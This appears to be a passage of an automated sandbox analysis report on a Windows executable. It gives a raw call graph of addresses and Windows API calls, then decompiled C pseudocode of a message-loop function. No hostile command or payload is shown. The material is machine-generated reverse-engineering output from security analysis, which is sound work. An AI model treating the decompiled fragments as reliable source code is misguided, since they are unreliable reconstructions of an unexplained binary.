28803 41df9c 28799->28803 28800->28798 28800->28799 28804 41db59 28801->28804 28805 41db3b 28801->28805 28817 41dd9b 28802->28817 28864 417f9d 46 API calls 3 library calls 28802->28864 28866 417f77 46 API calls __getptd_noexit 28803->28866 28860 420494 48 API calls 3 library calls 28804->28860 28858 417f77 46 API calls __getptd_noexit 28805->28858 28807->28817 28818 41dc47 28807->28818 28821 41de5b 28807->28821 28810 41db40 28859 417f8a 46 API calls __getptd_noexit 28810->28859 28812 41db67 28812->28800 28813 41dfa1 28867 417f8a 46 API calls __getptd_noexit 28813->28867 28816 413748 _free 46 API calls 28816->28789 28817->28789 28817->28816 28819 41dcab ReadFile 28818->28819 28828 41dd28 28818->28828 28822 41dcc9 GetLastError 28819->28822 28830 41dcd3 28819->28830 28820 41ded0 ReadFile 28823 41deef GetLastError 28820->28823 28831 41def9 28820->28831 28821->28817 28821->28820 28822->28818 28822->28830 28823->28821 28823->28831 28824 41ddec MultiByteToWideChar 28824->28817 28825 41de10 GetLastError 28824->28825 28825->28802 28826 41dda3 28833 41dd60 28826->28833 28834 41ddda 28826->28834 28827 41dd96 28862 417f77 46 API calls __getptd_noexit 28827->28862 28828->28817 28828->28826 28828->28827 28828->28833 28830->28818 28861 420494 48 API calls 3 library calls 28830->28861 28831->28821 28865 420494 48 API calls 3 library calls 28831->28865 28833->28824 28863 420494 48 API calls 3 library calls 28834->28863 28837 41dde9 28837->28824 28838->28721 28839->28739 28840->28723 28841->28740 28842->28739 28843->28731 28844->28740 28845->28742 28846->28741 28847->28739 28848->28774 28849->28789 28850->28779 28851->28785 28852->28789 28853->28784 28854->28791 28855->28787 28856->28791 28857->28789 28858->28810 28859->28789 28860->28812 28861->28830 28862->28817 28863->28837 28864->28817 28865->28831 28866->28813 28867->28817 28869 416b04 __malloc_crt 46 API calls 28868->28869 28870 420618 28869->28870 28870->28752 28871->28749 28872->28748 28876 4148b3 GetSystemTimeAsFileTime __aulldiv 28873->28876 28875 442c6b 28875->28246 28876->28875 28877->28253 28878->28259 28879->28259 28883 45272f __tzset_nolock _wcscpy 28880->28883 28881 44afef GetSystemTimeAsFileTime 28881->28883 28882 4528a4 28882->28167 28882->28168 28883->28881 28883->28882 28884 414d04 61 API calls __fread_nolock 28883->28884 28885 4150d1 81 API calls _fseek 28883->28885 28884->28883 28885->28883 28887 44b1bc 28886->28887 28888 44b1ca 28886->28888 28889 4149c2 116 API calls 28887->28889 28890 44b1e1 28888->28890 28891 44b1d8 28888->28891 28892 4149c2 116 API calls 28888->28892 28889->28888 28921 4321a4 28890->28921 28891->28194 28894 44b2db 28892->28894 28894->28890 28896 44b2e9 28894->28896 28895 44b224 28897 44b253 28895->28897 28900 44b228 28895->28900 28898 414a46 82 API calls 28896->28898 28902 44b2f6 28896->28902 28925 43213d 28897->28925 28898->28902 28901 44b235 28900->28901 28904 414a46 82 API calls 28900->28904 28905 44b245 28901->28905 28908 414a46 82 API calls 28901->28908 28902->28194 28903 44b25a 28906 44b260 28903->28906 28907 44b289 28903->28907 28904->28901 28905->28194 28909 44b26d 28906->28909 28911 414a46 82 API calls 28906->28911 28935 44b0bf 87 API calls 28907->28935 28908->28905 28912 44b27d 28909->28912 28915 414a46 82 API calls 28909->28915 28911->28909 28912->28194 28913 44b28f 28936 4320f8 46 API calls _free 28913->28936 28915->28912 28916 44b295 28917 44b2a2 28916->28917 28918 414a46 82 API calls 28916->28918 28919 44b2b2 28917->28919 28920 414a46 82 API calls 28917->28920 28918->28917 28919->28194 28920->28919 28922 4321cb 28921->28922 28924 4321b4 __tzset_nolock _memmove 28921->28924 28923 414d04 __fread_nolock 61 API calls 28922->28923 28923->28924 28924->28895 28926 4135bb _malloc 46 API calls 28925->28926 28927 432150 28926->28927 28928 4135bb _malloc 46 API calls 28927->28928 28929 432162 28928->28929 28930 4135bb _malloc 46 API calls 28929->28930 28931 432174 28930->28931 28933 432189 28931->28933 28937 4320f8 46 API calls _free 28931->28937 28933->28903 28934 432198 28934->28903 28935->28913 28936->28916 28937->28934 28938->28085 28939->28085 28940->28085 28941->28084 28942->28085 28943->28085 28944->28091 28945->28099 28946->28101 28947->28101 28948->28107 28998 410160 28949->28998 28951 41012f GetFullPathNameW 28952 410147 moneypunct 28951->28952 28952->27928 28954 4102cb SHGetDesktopFolder 28953->28954 28956 410333 _wcsncpy 28953->28956 28955 4102e0 _wcsncpy 28954->28955 28954->28956 28955->28956 28957 41031c SHGetPathFromIDListW 28955->28957 28956->27931 28957->28956 28959 4101bb 28958->28959 28965 425f4a 28958->28965 28960 410160 52 API calls 28959->28960 28961 4101c7 28960->28961 29002 410200 52 API calls 2 library calls 28961->29002 28962 4114ab __wcsicoll 58 API calls 28962->28965 28964 4101d6 29003 410200 52 API calls 2 library calls 28964->29003 28965->28962 28967 425f6e 28965->28967 28967->27933 28968 4101e9 28968->27933 28970 40f760 128 API calls 28969->28970 28971 40f584 28970->28971 28972 429335 28971->28972 28973 40f58c 28971->28973 28976 4528bd 118 API calls 28972->28976 28974 40f598 28973->28974 28975 429358 28973->28975 29020 4033c0 113 API calls 7 library calls 28974->29020 29021 434034 86 API calls _wprintf 28975->29021 28978 42934b 28976->28978 28981 429373 28978->28981 28982 42934f 28978->28982 28980 40f5b4 28980->27929 28984 4115d7 52 API calls 28981->28984 28985 431e58 82 API calls 28982->28985 28983 429369 28983->28981 28997 4293c5 moneypunct 28984->28997 28985->28975 28986 42959c 28987 413748 _free 46 API calls 28986->28987 28988 4295a5 28987->28988 28989 431e58 82 API calls 28988->28989 28990 4295b1 28989->28990 28991 402780 52 API calls 28991->28997 28994 401b10 52 API calls 28994->28997 28997->28986 28997->28991 28997->28994 29004 444af8 28997->29004 29007 44b41c 28997->29007 29014 4022d0 28997->29014 29022 44c7dd 64 API calls 3 library calls 28997->29022 28999 410167 _wcslen 28998->28999 29000 4115d7 52 API calls 28999->29000 29001 41017e _wcscpy 29000->29001 29001->28951 29002->28964 29003->28968 29005 4115d7 52 API calls 29004->29005 29006 444b27 _memmove 29005->29006 29006->28997 29009 44b429 29007->29009 29008 4115d7 52 API calls 29010 44b440 29008->29010 29009->29008 29011 44b45e 29010->29011 29012 401b10 52 API calls 29010->29012 29011->28997 29013 44b453 29012->29013 29013->28997 29015 4022e0 29014->29015 29017 40239d 29014->29017 29016 4115d7 52 API calls 29015->29016 29015->29017 29018 402320 moneypunct 29015->29018 29016->29018 29017->28997 29018->29017 29019 4115d7 52 API calls 29018->29019 29019->29018 29020->28980 29021->28983 29022->28997 29024 402417 29023->29024 29028 402539 moneypunct 29023->29028 29025 4115d7 52 API calls 29024->29025 29024->29028 29027 402443 29025->29027 29026 4115d7 52 API calls 29029 4024b4 29026->29029 29027->29026 29028->27937 29029->29028 29031 4022d0 52 API calls 29029->29031 29052 402880 95 API calls 2 library calls 29029->29052 29031->29029 29037 401566 29032->29037 29033 401794 29053 40e9a0 29033->29053 29036 4010a0 52 API calls 29036->29037 29037->29033 29037->29036 29038 40167a 29037->29038 29039 4017c0 29038->29039 29078 45e737 90 API calls 3 library calls 29038->29078 29039->27939 29041 40bc70 52 API calls 29040->29041 29050 40d451 29041->29050 29042 40d50f 29087 410600 52 API calls 29042->29087 29044 427c01 29088 45e737 90 API calls 3 library calls 29044->29088 29045 40e0a0 52 API calls 29045->29050 29047 401b10 52 API calls 29047->29050 29048 40d519 29048->27942 29050->29042 29050->29044 29050->29045 29050->29047 29050->29048 29085 40f310 53 API calls 29050->29085 29086 40d860 91 API calls 29050->29086 29052->29029 29054 40e9b2 29053->29054 29055 4276f1 29054->29055 29056 40e9ba 29054->29056 29079 45e737 90 API calls 3 library calls 29055->29079 29057 42770c 29056->29057 29058 40e9c2 29056->29058 29080 45e737 90 API calls 3 library calls 29057->29080 29061 40e9ca 29058->29061 29062 427724 29058->29062 29065 40e9d2 29061->29065 29066 42773f 29061->29066 29081 45e737 90 API calls 3 library calls 29062->29081 29063 427702 29063->29038 29064 42771a 29064->29038 29068 42775a 29065->29068 29069 40e9da 29065->29069 29082 45e737 90 API calls 3 library calls 29066->29082 29083 45e737 90 API calls 3 library calls 29068->29083 29072 40e9e3 29069->29072 29084 45e737 90 API calls 3 library calls 29069->29084 29070 427735 29070->29038 29072->29038 29072->29072 29073 427750 29073->29038 29075 42776b 29075->29038 29077 427783 29077->29038 29078->29038 29079->29063 29080->29064 29081->29070 29082->29073 29083->29075 29084->29077 29085->29050 29086->29050 29087->29048 29088->29048 29089->27955 29090->27956 29092 42c5fe 29091->29092 29144 4091c6 29091->29144 29093 40bc70 52 API calls 29092->29093 29092->29144 29094 42c64e InterlockedIncrement 29093->29094 29095 42c665 29094->29095 29100 42c697 29094->29100 29098 42c672 InterlockedDecrement Sleep InterlockedIncrement 29095->29098 29095->29100 29096 42c737 InterlockedDecrement 29097 42c74a 29096->29097 29101 408f40 VariantClear 29097->29101 29098->29095 29098->29100 29099 42c731 29099->29096 29100->29096 29100->29099 29195 408e80 VariantClear 29100->29195 29103 42c752 29101->29103 29201 410c60 VariantClear moneypunct 29103->29201 29104 42c6cf 29196 45340c 85 API calls 29104->29196 29107 42c6db 29108 402160 52 API calls 29107->29108 29109 42c6e5 29108->29109 29197 45340c 85 API calls 29109->29197 29111 42c6f1 29198 40d200 52 API calls 2 library calls 29111->29198 29113 42c6fb 29199 465124 53 API calls 29113->29199 29115 42c715 29116 42c76a 29115->29116 29117 42c719 29115->29117 29119 401b10 52 API calls 29116->29119 29200 46fe32 VariantClear 29117->29200 29120 42c77e 29119->29120 29121 401980 53 API calls 29120->29121 29127 42c796 29121->29127 29122 42c812 29203 46fe32 VariantClear 29122->29203 29124 42c82a InterlockedDecrement 29204 46ff07 54 API calls 29124->29204 29126 42c864 29205 45e737 90 API calls 3 library calls 29126->29205 29127->29122 29127->29126 29202 40ba10 52 API calls 2 library calls 29127->29202 29128 42c9ec 29207 47d33e 294 API calls 29128->29207 29132 42c9fe 29208 46feb1 VariantClear VariantClear 29132->29208 29134 408f40 VariantClear 29145 42c849 29134->29145 29135 42ca08 29136 401b10 52 API calls 29135->29136 29139 42ca15 29136->29139 29137 408f40 VariantClear 29140 42c891 29137->29140 29138 402780 52 API calls 29138->29145 29143 40c2c0 52 API calls 29139->29143 29206 410c60 VariantClear moneypunct 29140->29206 29142 401980 53 API calls 29142->29145 29146 42c874 29143->29146 29144->28016 29145->29128 29145->29134 29145->29138 29145->29142 29147 40a780 141 API calls 29145->29147 29146->29137 29148 42ca59 29146->29148 29147->29145 29148->29148 29150 40afc4 29149->29150 29151 40b156 29149->29151 29152 40afd5 29150->29152 29153 42d1e3 29150->29153 29209 45e737 90 API calls 3 library calls 29151->29209 29157 40a780 141 API calls 29152->29157 29174 40b11a moneypunct 29152->29174 29210 45e737 90 API calls 3 library calls 29153->29210 29156 40b143 29156->28016 29159 40b00a 29157->29159 29158 42d1f8 29162 408f40 VariantClear 29158->29162 29159->29158 29163 40b012 29159->29163 29161 42d4db 29161->29161 29162->29156 29164 40b04a 29163->29164 29165 42d231 VariantClear 29163->29165 29171 40b094 moneypunct 29163->29171 29168 40b05c moneypunct 29164->29168 29211 40e270 VariantClear moneypunct 29164->29211 29165->29168 29166 40b108 29166->29174 29212 40e270 VariantClear moneypunct 29166->29212 29167 42d425 moneypunct 29169 42d45a VariantClear 29167->29169 29167->29174 29168->29171 29173 4115d7 52 API calls 29168->29173 29169->29174 29171->29166 29171->29167 29173->29171 29174->29156 29213 45e737 90 API calls 3 library calls 29174->29213 29175->28016 29176->28016 29177->28016 29178->28016 29179->28016 29180->28016 29181->28016 29182->28016 29183->28016 29184->28021 29185->28021 29186->28021 29187->28021 29188->28021 29189->28021 29190->28021 29191->28021 29192->28021 29193->28016 29194->27963 29195->29104 29196->29107 29197->29111 29198->29113 29199->29115 29200->29099 29201->29144 29202->29127 29203->29124 29204->29145 29205->29146 29206->29144 29207->29132 29208->29135 29209->29153 29210->29158 29211->29168 29212->29174 29213->29161 29214 401cb0 29215 401cfb mciSendStringW 29214->29215 29216 426f4f DestroyWindow 29214->29216 29217 401d19 29215->29217 29222 426f5b 29215->29222 29216->29222 29218 401d26 29217->29218 29233 426f9b moneypunct 29217->29233 29220 401d33 29218->29220 29221 427007 29218->29221 29219 426f6b UnregisterHotKey 29219->29222 29223 401d40 29220->29223 29224 42702e 29220->29224 29221->29224 29228 42701c FreeLibrary 29221->29228 29222->29219 29222->29233 29227 408f40 VariantClear 29223->29227 29230 427043 VirtualFree 29224->29230 29238 427074 29224->29238 29225 426fb7 29225->29233 29263 40da20 CloseHandle 29225->29263 29226 426fc9 FindClose 29226->29233 29231 401d4e 29227->29231 29228->29221 29230->29224 29232 408f40 VariantClear 29231->29232 29239 401d65 29232->29239 29233->29221 29233->29225 29233->29226 29234 401dbf 29257 40e750 54 API calls 29234->29257 29237 401dc4 29237->29238 29241 408f40 VariantClear 29237->29241 29238->29238 29239->29234 29261 40d410 VariantClear 29239->29261 29262 40da90 VariantClear moneypunct 29239->29262 29242 401dd6 29241->29242 29258 4109a0 CloseHandle 29242->29258 29244 401dde 29259 401400 48 API calls moneypunct 29244->29259 29246 401df9 moneypunct 29260 4012f0 46 API calls moneypunct 29246->29260 29248 401e21 29249 408f40 VariantClear 29248->29249 29250 401e34 moneypunct 29249->29250 29251 410aa0 VariantClear 29250->29251 29252 401eb3 29251->29252 29253 410a70 FreeLibrary 29252->29253 29254 401ebe 29253->29254 29255 40ddd0 WaitForSingleObject InternetCloseHandle InternetCloseHandle CloseHandle 29254->29255 29256 401f16 29255->29256 29257->29237 29258->29244 29259->29246 29261->29239 29262->29239 29263->29225 29520 410ab0 6 API calls 29521 435eb0 GetMenu OleSetMenuDescriptor 29522 447abc 116 API calls 29524 445cb9 67 API calls __wcsicoll 29525 441544 GetWindowLongW DestroyAcceleratorTable CreateAcceleratorTableW GetForegroundWindow 29527 447b4e GetWindowLongW PostMessageW PostMessageW DefDlgProcW 29529 445948 SendMessageTimeoutW EnumChildWindows 29530 43634e IsWindowEnabled 29532 418151 InitializeCriticalSectionAndSpinCount 29533 431d57 SendMessageW 29534 434355 VirtualFreeEx CloseHandle 29536 435f58 GetClientRect CopyRect 29264 40e360 29265 4115d7 52 API calls 29264->29265 29266 40e3ec GetModuleFileNameW 29265->29266 29280 413a0e 29266->29280 29268 40e421 _wcsncat 29283 413a9e 29268->29283 29271 4115d7 52 API calls 29272 40e45e _wcscpy 29271->29272 29273 40bc70 52 API calls 29272->29273 29274 40e498 29273->29274 29286 40e4c0 29274->29286 29276 40e4a9 29277 4115d7 52 API calls 29278 40e4a1 _wcscat _wcslen _wcsncpy 29277->29278 29278->29276 29278->29277 29279 401c90 52 API calls 29278->29279 29279->29278 29300 413801 29280->29300 29330 419efd 29283->29330 29342 403350 29286->29342 29288 40e4cb RegOpenKeyExW 29289 427190 RegQueryValueExW 29288->29289 29290 40e4eb 29288->29290 29291 4271b0 29289->29291 29292 42721a RegCloseKey 29289->29292 29290->29278 29293 4115d7 52 API calls 29291->29293 29292->29278 29294 4271cb 29293->29294 29349 43652f 52 API calls 29294->29349 29296 4271d8 RegQueryValueExW 29297 42720e 29296->29297 29298 4271f7 29296->29298 29297->29292 29299 402160 52 API calls 29298->29299 29299->29297 29301 41389e 29300->29301 29307 41381a 29300->29307 29302 4139e8 29301->29302 29304 413a00 29301->29304 29327 417f77 46 API calls __getptd_noexit 29302->29327 29329 417f77 46 API calls __getptd_noexit 29304->29329 29305 4139ed 29328 417f25 10 API calls __mbschr_l 29305->29328 29307->29301 29315 41388a 29307->29315 29322 419e30 46 API calls __mbschr_l 29307->29322 29309 413967 29309->29268 29310 413909 29312 41396c 29310->29312 29313 413929 29310->29313 29312->29301 29312->29309 29316 41397a 29312->29316 29313->29301 29314 413945 29313->29314 29324 419e30 46 API calls __mbschr_l 29313->29324 29314->29301 29314->29309 29319 41395b 29314->29319 29315->29301 29315->29310 29323 419e30 46 API calls __mbschr_l 29315->29323 29326 419e30 46 API calls __mbschr_l 29316->29326 29325 419e30 46 API calls __mbschr_l 29319->29325 29322->29315 29323->29310 29324->29314 29325->29309 29326->29309 29327->29305 29328->29309 29329->29309 29331 419f13 29330->29331 29332 419f0e 29330->29332 29339 417f77 46 API calls __getptd_noexit 29331->29339 29332->29331 29335 419f2b 29332->29335 29334 419f18 29340 417f25 10 API calls __mbschr_l 29334->29340 29337 40e454 29335->29337 29341 417f77 46 API calls __getptd_noexit 29335->29341 29337->29271 29339->29334 29340->29337 29341->29334 29343 403367 29342->29343 29344 403358 29342->29344 29345 4115d7 52 API calls 29343->29345 29344->29288 29346 403370 29345->29346 29347 4115d7 52 API calls 29346->29347 29348 40339e 29347->29348 29348->29288 29349->29296 29539 441165 40 API calls 29540 436366 IsWindowVisible 29541 441361 GetWindowLongW DestroyWindow 29542 443b61 15 API calls 29543 443561 CloseHandle WriteFile 29544 448d62 68 API calls 29545 421565 56 API calls __fassign_l 29547 44256c InternetSetOptionW InternetOpenW 29549 435d6a MkParseDisplayName 29551 44036a CreateProcessW CloseHandle DefDlgProcW 29554 416370 47 API calls 3 library calls 29555 443f76 SetFilePointerEx SetFilePointerEx WriteFile 29556 449b77 6 API calls 29557 432770 VariantCopy 29558 44c777 MapVirtualKeyW 29559 436577 GetWindowLongW GetParent SendMessageW 29560 43637e PostMessageW 29350 40e500 29351 40bc70 52 API calls 29350->29351 29352 40e515 GetVersionExW 29351->29352 29353 402160 52 API calls 29352->29353 29354 40e557 29353->29354 29376 40e660 29354->29376 29361 427674 29364 4276c6 GetSystemInfo 29361->29364 29362 40e5e0 29366 4276d5 GetSystemInfo 29362->29366 29390 40efd0 29362->29390 29363 40e5cd GetCurrentProcess 29397 40ef20 LoadLibraryA GetProcAddress 29363->29397 29364->29366 29369 40e629 29394 40ef90 29369->29394 29372 40e641 FreeLibrary 29373 40e644 29372->29373 29374 40e653 FreeLibrary 29373->29374 29375 40e656 29373->29375 29374->29375 29377 40e667 29376->29377 29378 42761d 29377->29378 29379 40c600 52 API calls 29377->29379 29380 40e55c 29379->29380 29381 40e680 29380->29381 29382 40e687 29381->29382 29383 427616 29382->29383 29384 40c600 52 API calls 29382->29384 29385 40e566 29384->29385 29385->29361 29386 40ef60 29385->29386 29387 40e5c8 29386->29387 29388 40ef66 LoadLibraryA 29386->29388 29387->29362 29387->29363 29388->29387 29389 40ef77 GetProcAddress 29388->29389 29389->29387 29391 40e620 29390->29391 29392 40efd6 LoadLibraryA 29390->29392 29391->29364 29391->29369 29392->29391 29393 40efe7 GetProcAddress 29392->29393 29393->29391 29398 40efb0 LoadLibraryA GetProcAddress 29394->29398 29396 40e632 GetNativeSystemInfo 29396->29372 29396->29373 29397->29362 29398->29396 29562 44b304 GetSystemTimeAsFileTime 29565 434b02 55 API calls moneypunct 29399 411703 29400 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 29399->29400 29402 411750 __IsNonwritableInCurrentImage 29400->29402 29403 41130a 51 API calls __cinit 29400->29403 29403->29402 29566 440306 DefDlgProcW 29567 432704 9 API calls 29568 445f03 SendMessageTimeoutW GetWindowThreadProcessId GetCurrentThreadId AttachThreadInput SetFocus 29569 43550b 71 API calls 29570 44870c 29 API calls 29571 433d09 GetClassNameW 29572 436108 CopyRect CopyRect 29573 440f0a 12 API calls 29574 443f0a 55 API calls moneypunct 29576 40b510 VariantClear 29577 444310 32 API calls 29578 44cd1c 6 API calls 29579 413d1a 63 API calls 5 library calls 29580 40bf20 171 API calls 29581 44bd27 80 API calls 4 library calls 29582 430727 GetWindowRect IsWindowVisible GetDlgCtrlID 29583 448123 14 API calls 2 library calls 29584 44a72e Beep 29585 445934 56 API calls 29586 435f33 GetClientRect 29588 44bb30 56 API calls _wcslen 29590 440d32 GetWindowLongW 29592 43293f 54 API calls 29594 43513e 54 API calls 29596 43333c 60 API calls __wcsicoll 29597 4165c1 5 API calls ___security_init_cookie 29598 4363c7 EnableWindow EnableWindow 29599 44b7c1 58 API calls 29600 4313ca 65 API calls moneypunct 29601 433fce 6 API calls 29602 4485cb 7 API calls _memset 29603 44b5cb 58 API calls 29604 40cbd0 VariantClear QueryPerformanceCounter QueryPerformanceFrequency 29607 44bbd2 61 API calls 2 library calls 29608 4347d5 11 API calls 29609 431ddb CreateFileW SetFileTime CloseHandle 29610 4499db 14 API calls 29611 445be4 61 API calls __wcsicoll 29613 4447e0 11 API calls 29614 431be8 86 API calls 4 library calls 29615 40c1f0 200 API calls _wcslen 29616 40e9f0 141 API calls 29619 4319f5 CloseHandle CreateEventW 29620 4363f5 MoveWindow 29622 4443fc 15 API calls 29624 4311fc CoTaskMemAlloc _wcslen _wcscpy 29625 4439fb 53 API calls 29626 40f380 53 API calls 29627 44b785 CloseHandle EnterCriticalSection InterlockedExchange LeaveCriticalSection LeaveCriticalSection 29629 44cb87 61 API calls 29631 440b82 8 API calls 29632 44a983 137 API calls 29635 447b89 56 API calls 29636 44bf8b 59 API calls 3 library calls 29637 436399 ShowWindow ShowWindow 29639 445b98 GetParent GetParent GetClassNameW GetFocus 29640 42159e 65 API calls __forcdecpt_l 29641 440d98 7 API calls 29642 43659e 10 API calls 29645 4367a3 SendMessageW SendMessageW 29646 4171a2 70 API calls 6 library calls 29647 4479a0 35 API calls 29648 42fda6 ClientToScreen ImageList_DragMove DefDlgProcW 29650 4403ae GetWindowLongW GetWindowRect GetWindowRect MoveWindow 29651 447ba8 90 API calls 29652 432fad MonitorFromRect 29653 40d3b0 296 API calls 29654 445db6 10 API calls 29656 4357b7 12 API calls 29657 4327b5 58 API calls __wcsicoll 29658 44a7bc 14 API calls 29660 4151bb 66 API calls 12 library calls 29662 4115ba 46 API calls std::exception::exception 29663 4491b9 75 API calls __write_nolock 29664 4333be 9 API calls 29665 4435b9 8 API calls 29666 4465bb 129 API calls

                                  Executed Functions

                                  Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E004091E0(struct tagMSG* __ecx, struct tagMSG* __edx, void* __fp0, signed int _a4) {
				struct tagMSG _v32;
				char _v48;
				char _v64;
				char _v80;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				intOrPtr _v152;
				int _v156;
				char _v164;
				struct tagMSG _v188;
				struct HWND__* _v192;
				int _v196;
				struct HWND__* _v204;
				char _v208;
				struct HWND__* _v220;
				struct tagMSG _v244;
				char _v248;
				char _v252;
				long _v256;
				long _v260;
				struct HWND__* _v264;
				int _v268;
				struct HWND__* _v272;
				signed int _v276;
				char _v277;
				char _v288;
				int _v292;
				struct HWND__* _v300;
				struct HWND__* _v304;
				struct HWND__* _v308;
				struct tagMSG* _v312;
				char _v316;
				long _v324;
				signed int _v328;
				char _v329;
				struct HWND__* _v332;
				struct tagMSG* _v336;
				void* __ebx;
				void* __edi;
				signed int __esi;
				intOrPtr _t280;
				int _t282;
				intOrPtr _t283;
				struct tagMSG* _t285;
				struct HWND__* _t291;
				struct HWND__* _t295;
				intOrPtr* _t297;
				struct HWND__* _t299;
				struct HWND__* _t302;
				struct HWND__* _t307;
				struct HWND__* _t329;
				struct HWND__* _t331;
				struct HWND__* _t336;
				struct HWND__* _t337;
				struct HWND__* _t338;
				struct HWND__* _t342;
				struct HWND__* _t347;
				void* _t349;
				struct HWND__* _t355;
				struct tagMSG* _t358;
				long _t359;
				void* _t368;
				void* _t379;
				void* _t380;
				struct tagMSG* _t384;
				signed int _t385;
				void* _t400;
				signed int _t403;
				void* _t405;
				int _t406;
				void* _t407;
				struct HWND__* _t414;
				int _t415;
				struct HWND__* _t417;
				struct HWND__* _t423;
				intOrPtr _t431;
				struct HWND__* _t437;
				struct HWND__* _t442;
				intOrPtr _t460;
				void* _t462;
				struct tagMSG* _t467;
				signed int _t480;
				struct tagMSG* _t511;
				signed int _t545;
				void* _t549;
				struct tagMSG** _t552;
				struct HWND__** _t553;
				struct tagMSG* _t560;
				struct HWND__* _t564;
				struct HWND__* _t565;
				signed int _t566;
				signed int _t570;
				struct HWND__** _t572;
				void* _t598;

				_t606 = __fp0;
				_t511 = __edx;
				_t471 = __ecx;
				_t572 = (_t570 & 0xfffffff8) - 0x14c;
				_t533 = __ecx;
				_t280 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t280 >= 0xf3c) {
					 *0x4974e2 = 0;
					E0045E737(__fp0, __ecx, 0x9a, 0xffffffff);
					_t282 = 1;
					L33:
					return _t282;
				}
				_t283 = _t280 + 1;
				_v312 = __ecx;
				 *((intOrPtr*)(__ecx + 0xec)) = _t283;
				if(_t283 == 1) {
					E00410940(__ecx, __fp0);
				}
				_t533[0x51] = 0;
				if(_t533[0x3f] != 0) {
					L30:
					_t285 = _t533[0x3b];
					_t533[0x51] = 0;
					if(_t285 == 1) {
						E0040F190(_t471, _t533);
						__eflags = _t533[0x3f] - 1;
						if(__eflags == 0) {
							goto L32;
						}
						E00401A50(_t533, _t511, __eflags, _t606);
						LockWindowUpdate(0);
						DestroyWindow( *0x497518); // executed
						_t291 = GetMessageW( &_v32, 0, 0, 0);
						__eflags = _t291;
						if(_t291 <= 0) {
							goto L32;
						}
						do {
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
							_t295 = GetMessageW( &_v32, 0, 0, 0);
							__eflags = _t295;
						} while (_t295 > 0);
						goto L32;
					} else {
						_t533[0x3b] = _t285 - 1;
						L32:
						_t282 = 0;
						goto L33;
					}
				} else {
					while(_t533[0x51] == 0) {
						if( *0x4974e3 != 0) {
							L10:
							if( *0x4a8624 != 0) {
								_t297 =  *0x4a8628; // 0x0
								_t460 =  *_t297;
								E00431D7F();
								_t299 = _t533[0x6c];
								_t545 = 0;
								__eflags = _t299;
								if(_t299 == 0) {
									L80:
									__eflags = _t545 - _t299;
									if(__eflags == 0) {
										goto L11;
									}
									E00465124( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  *((intOrPtr*)(_t533[0x6b] + _t545 * 4)), __eflags, _t533,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  &_v252,  &_v112,  &_v100,  &_v136);
									_t511 = _t533[0x6b];
									_t471 =  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18;
									_v276 =  &(_v276->i);
									E0040E0A0( &(_t533[0x53]),  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18);
									E0047D33E( *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18, _t511, _t606, _t533,  &(_v276->i), 1, 0);
									L29:
									if(_t533[0x3f] == 0) {
										continue;
									}
									goto L30;
								}
								_t471 = _t533[0x6b];
								do {
									_t511 = _t471->hwnd;
									__eflags = _t511->hwnd;
									if(_t511->hwnd == 0) {
										goto L79;
									}
									_t511 = _t511->hwnd;
									__eflags = _t511->hwnd - _t460;
									if(_t511->hwnd == _t460) {
										goto L80;
									}
									L79:
									_t545 = _t545 + 1;
									_t471 =  &(_t471->message);
									__eflags = _t545 - _t533[0x6c];
								} while (_t545 < _t533[0x6c]);
								goto L80;
							}
							L11:
							if( *0x4974ec == 1) {
								__eflags =  *0x4974e3;
								if( *0x4974e3 != 0) {
									goto L12;
								}
								Sleep(0xa);
								goto L29;
							}
							L12:
							if(_t533[0x118] != 0) {
								__eflags =  *0x4a954c;
								if( *0x4a954c != 0) {
									goto L13;
								}
								_t467 = _t533[0x116];
								 *0x4a954c = 1;
								_v308 = 0;
								_v328 = _t467;
								while(1) {
									_t511 =  &_v328;
									 *_t572 = 0;
									_t329 = E00442A55(_t511, _t471);
									__eflags = _t329;
									if(_t329 == 0) {
										goto L93;
									}
									_t347 = _t467->hwnd;
									__eflags =  *((char*)(_t347 + 0x11));
									if( *((char*)(_t347 + 0x11)) != 0) {
										L92:
										_t471 =  &_v324;
										E00440847( &_v328,  &_v324);
										_t467 = _v336;
										continue;
									}
									_v324 = _t347;
									_t349 = E0040C620( *((intOrPtr*)(_t347 + 0x14)));
									__eflags = _t511;
									if(__eflags < 0) {
										goto L92;
									}
									if(__eflags > 0) {
										L91:
										_v308 =  &(_v308->i);
										 *((intOrPtr*)(_t467->hwnd + 0x14)) = timeGetTime();
										E00465124(_t467,  &_v248, __eflags, _t533, _t467,  &_v248,  &_v128,  &_v144,  &_v140);
										_t355 =  &(_v272->i);
										__eflags = _t355;
										_v272 = _t355;
										 *((char*)(_t467->hwnd + 0x10)) = 1;
										E0047D33E(_t467, _t467->hwnd, _t606, _t533, _t355, 1, 0);
										 *((char*)(_t467->hwnd + 0x10)) = 0;
										goto L92;
									}
									__eflags = _t349 -  *((intOrPtr*)(_v324 + 0x18));
									if(__eflags < 0) {
										goto L92;
									}
									goto L91;
								}
								while(1) {
									L93:
									_v328 = _t533[0x116];
									while(1) {
										L94:
										_t471 =  &_v328;
										 *_t572 = 0;
										_t331 = E00442A55( &_v328,  &_v328);
										__eflags = _t331;
										if(_t331 == 0) {
											break;
										}
										_t511 = _v328;
										_t342 = _t511->hwnd;
										__eflags =  *((char*)(_t342 + 0x11));
										if( *((char*)(_t342 + 0x11)) != 0) {
											E004521B3( &(_t533[0x116]),  &_v328);
											L93:
											_v328 = _t533[0x116];
											continue;
										}
										_t471 =  &_v324;
										_t511 =  &_v328;
										E00440847(_t511,  &_v324);
									}
									__eflags = _v308;
									 *0x4a954c = 0;
									if(_v308 > 0) {
										goto L29;
									}
									goto L13;
								}
							}
							L13:
							if( *0x4a863c != 0) {
								__eflags = _t533[0x119] - 1;
